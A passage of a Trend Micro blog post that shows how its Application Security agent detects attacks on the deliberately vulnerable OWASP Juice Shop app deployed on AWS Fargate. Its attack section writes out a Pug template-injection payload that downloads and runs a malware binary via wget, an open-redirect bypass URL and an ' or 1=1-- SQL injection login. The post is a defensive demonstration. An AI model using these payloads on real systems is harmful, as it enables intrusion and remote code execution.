{"id":42336,"date":"2021-06-24T00:00:00","date_gmt":"2021-06-24T00:00:00","guid":{"rendered":"https:\/\/www.trendmicro.com\/en_us\/devops\/21\/f\/nist-guidelines-for-containerized-application-security.html"},"modified":"2021-06-24T00:00:00","modified_gmt":"2021-06-24T00:00:00","slug":"nist-guidelines-for-containerized-application-security-threat-researcher","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/","title":{"rendered":"NIST Guidelines for Containerized Application Security Threat Researcher"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/sec-for-contain.jpg\"><!-- Begin mPulse library --><!-- END mPulse library --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width\"> <meta name=\"description\" content=\"In line with the suggestions from NIST, this demo shows how Cloud One protects container applications against threats and vulnerabilities.\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\" content=\"how to,container security,article,multi cloud\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"defaultArticleWithoutHero\"> <meta property=\"article:published_time\" content=\"2021-06-24\"> <meta property=\"article:tag\" content=\"container security\"> <meta property=\"article:section\" content=\"how to\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/devops\/21\/f\/nist-guidelines-for-containerized-application-security.html\"> <title>NIST Guidelines for Containerized Application Security<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/devops\/21\/f\/nist-guidelines-for-containerized-application-security.html\"><br \/>\n<meta property=\"og:title\" content=\"NIST Guidelines for Containerized Application Security\"><br \/>\n<meta property=\"og:description\" content=\"In line with the suggestions from NIST, this demo shows how Cloud One protects container applications against threats and vulnerabilities.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/sec-for-contain.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"NIST Guidelines for Containerized Application Security\"><br \/>\n<meta name=\"twitter:description\" content=\"In line with the suggestions from NIST, this demo shows how Cloud One protects container applications against threats and vulnerabilities.\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/sec-for-contain.jpg\"> <\/head> <body class=\"articlepage page basicpage context-business context-devops\" id=\"readabilityBody\" readability=\"50.382535299328\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layer *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1967892002\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"7.177033492823\">\n<div class=\"article-details\" role=\"heading\" readability=\"33.492822966507\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Container Security<\/p>\n<p class=\"article-details__description\">Learn how to secure containers and protect against breaches.<\/p>\n<p class=\"article-details__author-by\">By: Yash Verma <time class=\"article-details__date\">June 24, 2021<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"43.688440366972\">\n<div readability=\"36.252110091743\">\n<p>The need for quick and reliable deployment has led to new technological advancements like containers. If you\u2019re part of the STAT that uses containers, you may also be part of the STAT that experienced a container security related incident. And that\u2019s why you might be reading this article, hoping to learn how to secure said containers so a breach doesn\u2019t happen again. You\u2019re in the right place.<\/p>\n<p><a href=\"https:\/\/nvlpubs.nist.gov\/nistpubs\/SpecialPublications\/NIST.SP.800-190.pdf\" target=\"_blank\" rel=\"noopener\">NIST Application Container Security Guide<\/a> proposes several ways to secure your containers from implementation through usage:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">&nbsp;Tailor the operational culture and processes to support the new ways of developing, running, and supporting applications introduced by containers<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Reduce attack surfaces by using container-specific host operating systems (OS)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Only group containers with the same purpose, sensitivity, and threat posture on a single host OS to make it more difficult for a hacker to expand its attack to other groups<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Implement container-specific vulnerability management tools and processes for images<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Use a <b><span class=\"rte-red-text\">zero-trust<\/span><\/b> approach to building, running, and managing containers<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Deploy a dedicated container-aware runtime defense tool as a security solution instead of traditional WAF and IPS rules that don\u2019t provide suitable protection for containers.<\/span><\/li>\n<\/ul>\n<p>In line with the suggestions from NIST, this demo will use <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/hybrid-cloud\/cloud-one-application-security.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Cloud One\u2122 \u2013 Application Security<\/a> to protect container applications against threats and vulnerabilities, including those featured in the <a href=\"https:\/\/owasp.org\/www-project-top-ten\/\" target=\"_blank\" rel=\"noopener\">OWASP Top 10 Vulnerabilities<\/a> list. <a href=\"https:\/\/www.trendmicro.com\/en_us\/devops\/21\/e\/simple-application-security-integrations-for-devops.html\" target=\"_blank\" rel=\"noopener\">Application Security provides<\/a> runtime protection by automatically hooking into your framework at key points to identify and prevent hacks earlier. &nbsp;The solution was built with developers in mind, and protects:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Standalone containers running on host or directly under container-orchestration services on-premise (like Kubernetes)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Containers running under various cloud services like Amazon Elastic Container Service (ECS), Amazon Elastic Kubernetes Service (EKS), and other services involving container management.<\/span><\/li>\n<\/ul>\n<p>Want the full list of Application Security benefits? Check out <a href=\"https:\/\/www.trendmicro.com\/en_us\/devops\/21\/e\/simple-application-security-integrations-for-devops.html\" target=\"_blank\" rel=\"noopener\">this article.<\/a><\/p>\n<p>Let\u2019s take a look at how to use Application Security to protect against <a href=\"https:\/\/owasp.org\/www-project-juice-shop\/\" target=\"_blank\" rel=\"noopener\">OWASP Juice Shop<\/a>, a sophisticated and modern vulnerability. For this demo, you will need to register for a free 30-day trial of Application Security. Get started <a href=\"https:\/\/cloudone.trendmicro.com\/SignUp.screen\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p><b><span class=\"body-subhead-title\">About the demo<\/span><\/b><\/p>\n<p>Juice Shop is ideal for security trainings, awareness demos, capture the flags (CTFs), and as a playground for security tools because it encompasses vulnerabilities from the entire OWASP Top Ten and many other real-world security flaws. &nbsp;We will be deploying Juice Shop as a <a href=\"https:\/\/github.com\/bkimminich\/juice-shop#docker-container\" target=\"_blank\" rel=\"noopener\">docker image<\/a> using AWS Fargate running on Amazon ECS. Below is the architectural overview:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image1.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"34.134003350084\">\n<div readability=\"24.240089335567\">\n<p><b><span class=\"body-subhead-title\">Building the Docker image<\/span><\/b><\/p>\n<p>Follow these steps to build the docker image managed by Application Security and upload it to Amazon Elastic Container Registry (ECR).<\/p>\n<p>You will need a Linux OS with latest versions of the following software packages:<\/p>\n<ol type=\"a\">\n<li>Python<\/li>\n<li>AWS Command Line Interface (CLI)<\/li>\n<li>NPM<\/li>\n<li>Docker Engine<\/li>\n<li>Git<\/li>\n<\/ol>\n<p>You can also use Microsoft Windows.<\/p>\n<ol readability=\"17.764137931034\">\n<li>Clone the GitHub repository for Juice Shop application on your local Linux OS. <a href=\"https:\/\/github.com\/bkimminich\/juice-shop\" target=\"_blank\" rel=\"noopener\">Click here<\/a>.<\/li>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;Based on the type of language the application uses, you can refer to the <a href=\"https:\/\/cloudone.trendmicro.com\/docs\/application-security\/\" target=\"_blank\" rel=\"noopener\">this link<\/a> to learn how to setup the agent. We will be using <b>node.js<\/b>.<\/p>\n<li>Edit&nbsp;<i><span class=\"rte-navy-blue-text\">server.ts<\/span>&nbsp;<\/i>file and the following code at the beginning of the file:<\/li>\n<p><span class=\"blockquote\"><i>require(&#8216;trend_app_protect&#8217;);<\/i><\/span><\/p>\n<li>Create a file in the application root folder named <i><span class=\"rte-navy-blue-text\">trend_app_protect.json<\/span><\/i>. The contents should be as follows:<\/li>\n<p><span data-rte-class=\"rte-temp\"><span class=\"blockquote\">{<br \/>&nbsp; &#8220;key&#8221;: &#8220;&lt;key to be copied from Application Security console after creating a group&gt;&#8221;,<br \/>&nbsp; &#8220;secret&#8221;: &lt;secret to be copied from Application Security console after creating a group&gt;<br \/>}<\/span><\/span><\/p>\n<li>Run the following command from the application root folder:<\/li>\n<p><span class=\"blockquote\"><span data-rte-class=\"rte-temp\"><i>npm install &#8211;save python<\/i><\/span><\/span><\/p>\n<p><span class=\"blockquote\"><span data-rte-class=\"rte-temp\"><i>npm install &#8211;save trend_app_protect<\/i><\/span><\/span><\/p>\n<p>If you receive a <span class=\"rte-red-text\">make error&nbsp;<\/span>message while installing trend_app_protect, try installing it on a Red Hat Enterprise Linux (RHEL)-based OS with the following: <i><span data-rte-class=\"rte-temp\"><span class=\"blockquote\">yum install -y make gcc*<\/span><\/span><\/i><\/p>\n<p>For Debian GNU based, you can try: <span class=\"pre\">apt-get install build-essential<\/span><\/p>\n<li>Now that our Docker image is managed by Application Security, it is ready to be built. Run the following command from the application root folder:<\/li>\n<p><span class=\"blockquote\"><i>docker build.<\/i><\/span><\/p>\n<li>If the build is successful, you will receive a message with an image ID.<\/li>\n<li>To upload the image to Amazon ECR, create a private repository. Search for ECR in AWS console.<\/li>\n<li>Click on&nbsp;<i>create repository,<\/i>name and keep the repository private, and keep other settings unchanged for now.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image2.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"9\">\n<li>Go to your Linux console to install python and then use pip install AWS CLI:<\/li>\n<p><span class=\"blockquote\"><i>yum install python<\/i><\/span><\/p>\n<p><span class=\"blockquote\"><i>pip install awscli<\/i><\/span><\/p>\n<li>Configure your AWS CLI by creating a user using the AWS Identity and Access Management (IAM) console and generating an AWS access key and secret.<\/li>\n<p><i><span class=\"blockquote\">aws configure<\/span><\/i><\/p>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image3.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div readability=\"6.5\">\n<ol start=\"11\" readability=\"0\">\n<li>Retrieve an authentication token and authenticate your Docker client to your created registry. After you receive the <span class=\"rte-blue-text\">Login succeeded<\/span>&nbsp;message,&nbsp;use the AWS CLI:<\/li>\n<p><i><span class=\"blockquote\">aws ecr get-login-password &#8211;region ap-south-1 | docker login &#8211;username AWS &#8211;password-stdin &lt;Account-id&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com<\/span><\/i><\/p>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image4.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"13.5\">\n<ol start=\"12\" readability=\"2\">\n<li>Tag your newly created Docker image and upload it to your Amazon ECR repository :<\/li>\n<p><span class=\"blockquote\"><i>docker tag &lt;image-id&gt; &lt;Account-id&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com\/&lt;repo_name&gt;:&lt;Image_name_you_want_to_give&gt;<\/i><\/span><\/p>\n<p><span class=\"blockquote\"><i>docker push &lt;Account-id&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com\/&lt;repo_name&gt;:&lt;Image_name_you_want_to_give&gt;<\/i><\/span><\/p>\n<li>Check the Amazon ECR repository to make sure your image is uploaded.<\/li>\n<\/ol>\n<p><b><span class=\"body-subhead-title\">Deploying the uploaded docker image using AWS Fargate<\/span><\/b><\/p>\n<p>Search for Amazon ECS in the AWS console. Using this service, create an AWS ECS cluster by clicking <span class=\"rte-navy-blue-text\"><i>Create Cluster<\/i><\/span>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image5.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"2\">\n<li>After clicking on <i>Create Cluster<\/i>, select <span class=\"rte-navy-blue-text\">Networking only (Powered by AWS Fargate)<\/span> and click <i>Next Step<\/i>.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image6.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"3\">\n<li>Name your cluster. If you want to create a new Amazon Virtual Private Cloud (VPC), tick the option for it or leave it unchecked to use an existing one. Also, you can enable CloudWatch Logs for your container by checking Enable Container Insights. Next, click <i>Create<\/i>.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image7.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"4\">\n<li>View your cluster in the cluster option. Below the cluster option, click <i>Task Definition<\/i> and create a new one.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image8.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"5\">\n<li>Choose <i>Fargate<\/i>, or you can choose <i>EC2<\/i> based on your use case. Click on <i>Next Step<\/i>.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image9.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"6\">\n<li>Name your task and choose an execution role. For Fargate, the Network Mode &#8220;awsvpc&#8221; is a fixed option.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image10.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"7\">\n<li>Assign <i>Task memory<\/i> and <i>Task CPU<\/i> based on your application. Click on&nbsp;<i><span class=\"rte-navy-blue-text\">Add Container<\/span><\/i>&nbsp;to add the image you uploaded on Amazon ECR.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image11.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"8\">\n<li>Name your container, copy the image URI of the uploaded container image from Amazon ECR and paste it in the&nbsp;<i><span class=\"rte-navy-blue-text\">Image<\/span><\/i>&nbsp;box. Keep <i>Soft limit<\/i> as the default (128) and enter 3000 in <i>Port mappings<\/i> for Juice Shop. Please note this depends on which application port is open. For our demo, the Juice Shop website port is 3000.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image12.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"9\">\n<li>Keep other settings as is and click <i>Create Add<\/i>, then click <i>Create Task<\/i>.<\/li>\n<li>To start running your created task, click <i>View Task Definition<\/i> and click <i>Actions<\/i> and <i>Run task<\/i>.<\/li>\n<li>Select <i>Fargate<\/i>, the <i>VPC,<\/i> and <i>Subnet<\/i>. You can create new Security group. If you choose an existing one, leave all other settings as it is and click <i>Run Task<\/i>.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image13.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.148640661939\">\n<div readability=\"18.243794326241\">\n<ol start=\"12\">\n<li>Monitor the status of the task. If the status is<i> RUNNING<\/i>, copy the public IP address shown in the running task info and paste it in the browser with the intended port (3000 in our case) to access the website.<\/li>\n<p><i>http:\/\/&lt;IP&gt;:3000<\/i><\/p>\n<li>Check the Application Security console\u2014you should see that the group shows <i>Agent Activated <\/i>automatically after you access website for first time. Happy hacking.<\/li>\n<\/ol>\n<p><b><span class=\"body-subhead-title\">Attacking the Juice Shop web application running on Amazon ECS<\/span><\/b><\/p>\n<p>Now we will see how Application Security can protect your environment from various attacks. For the purpose of this demo, Application Security is set in detect mode to show the severity and motive of attack.<\/p>\n<p>For a refresher on the types of vulnerabilities and policies Application Security can protect, read <a href=\"https:\/\/www.trendmicro.com\/en_us\/devops\/21\/e\/simple-application-security-integrations-for-devops.html\" target=\"_blank\" rel=\"noopener\">this article.<\/a><\/p>\n<p><b><span class=\"body-subhead-title\">Vulnerability: Remote command execution<\/span><\/b><\/p>\n<ol readability=\"0\">\n<li>Google search <a href=\"https:\/\/github.com\/J12934\/juicy-malware\" target=\"_blank\" rel=\"noopener\">juicy malware<\/a>.<\/li>\n<li>Our goal is to use remote code execution (RCE) to make the server download and execute the malware version for the server OS. If you\u2019re using Linux, you can run the following:&nbsp;<\/li>\n<p><span class=\"rte-red-text\">wget -O malware <a href=\"https:\/\/github.com\/juice-shop\/juicy-malware\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/J12934\/juicy-malware\/blob\/master\/juicy_malware_linux_64?raw=true<\/a> &amp;&amp; chmod +x malware &amp;&amp; .\/malware<\/span><\/p>\n<li>If we carefully analyze the&nbsp;<span class=\"rte-navy-blue-text\">http:\/\/server-ip:3000\/profile<\/span>&nbsp;URI page, we can determine it is not an Angular page. This page is written using Pug, and since it is a Template engine, it is perfectly suited for server-side template injection (SSTI) mischief.<\/li>\n<li>Set your username to 1+1 and click <i>Set Username<\/i>. Your username will be just shown as 1+1 under the profile picture.<\/li>\n<li>To try to execute a template injection into Pug, set your username to #{1+1} and click <i>Set Username<\/i>. Your username will now be shown as 2 under the profile picture.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image14.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"27.292471042471\">\n<div readability=\"8.3976833976834\">\n<ol start=\"6\">\n<li>Craft a payload that will abuse the lack of encapsulation of JavaScript&#8217;s global.process object to dynamically load a library. This will allow you to spawn a process on the server that will then download and execute the malware.<\/li>\n<li>The payload might look like:<\/li>\n<\/ol>\n<p><span class=\"rte-red-text\">#{global.process.mainModule.require(&#8216;child_process&#8217;).exec(&#8216;wget -O malware&nbsp;<a href=\"https:\/\/github.com\/juice-shop\/juicy-malware\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/J12934\/juicy-malware\/blob\/master\/juicy_malware_linux_64?raw=true<\/a>&nbsp;&amp;&amp; chmod +x malware &amp;&amp; .\/malware&#8217;)}.<\/span><\/p>\n<p>Submit this as&nbsp;Username and the exploit should be successful.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image15.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<p><u>Detection: <\/u><b>Yes<\/b><\/p>\n<p><u>Triggers:<\/u><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image16.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p><u>Policy:<\/u> <b>Remote Code Execution<\/b><\/p>\n<p><b><span class=\"body-subhead-title\">Vulnerability: Open Redirect<\/span><\/b><\/p>\n<ol>\n<li>Pick one of the redirect links in the application, for example <span class=\"rte-red-text\">http:\/\/server-ip:3000\/redirect?to=https:\/\/github.com\/bkimminich\/juice-shop<\/span> from the <i>GitHub<\/i> button in the navigation bar.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image17.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"2\">\n<li>Upon trying to redirect to some unrecognized URL, it fails due to Application Security safelist validation. You will receive the message: <b><span class=\"rte-red-text\">406 Error: Unrecognized target URL for redirect<\/span><\/b><\/li>\n<li>Removing the<i>to<\/i>parameter (<span class=\"rte-red-text\">http:\/\/server-ip:3000\/redirect<\/span>) will instead yield a <span class=\"rte-red-text\">500 TypeError: Cannot read property &#8216;indexOf&#8217; of undefined<\/span> where the <span class=\"rte-red-text\">indexOf<\/span> indicates a severe flaw due to safelisting.<\/li>\n<li>Craft a redirect URL so that the target URL now contains a parameter containing a URL from the safelist, such as: <span class=\"rte-red-text\">http:\/\/server-ip:3000\/redirect?to=http:\/\/kimminich.de?pwned=https:\/\/github.com\/bkimminich\/juice-shop<\/span><\/li>\n<\/ol>\n<p><u>Detection<\/u>: <b>YES<\/b><\/p>\n<p><u>Triggers:<\/u><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image18.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><u>Policy:<\/u> <b>Open Redirect<\/b><\/p>\n<p><b><span class=\"body-subhead-title\">Vulnerability: Malicious payload<\/span><\/b><\/p>\n<ol>\n<li>Navigate to the complaint section (http:\/\/server-ip\/complain) and try to upload a normal file and capture it with Burp.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image19.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"2\">\n<li>Replace the normal file content with the XML external entity injection (XXE) payload:<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image20.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"3\">\n<li>Check for the desired output in the response.<\/li>\n<\/ol>\n<p><u>Detection<\/u>: <b>YES<\/b><\/p>\n<p><u>Triggers:<\/u><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image21.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image22.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p><u>Policy:<\/u> <b>Malicious Payload<\/b><\/p>\n<p><b><span class=\"body-subhead-title\">Vulnerability: SQL Injection<\/span><\/b><\/p>\n<ol>\n<li>Admin login hack:<\/li>\n<\/ol>\n<p>Log in with&nbsp;<i>Email<\/i> or 1=1&#8211;&nbsp;and any <i>Password<\/i> to authenticate the first entry in the Users<span class=\"rte-navy-blue-text\"> <\/span>table, which coincidentally happens to be the administrator.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image23.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<p>Here\u2019s the result:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image24.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<p><u>Detection<\/u>: <b>YES<\/b><\/p>\n<p><u>Triggers:<\/u><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image25.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p><u>Policy<\/u>: <b>SQL Injection<\/b><\/p>\n<ol 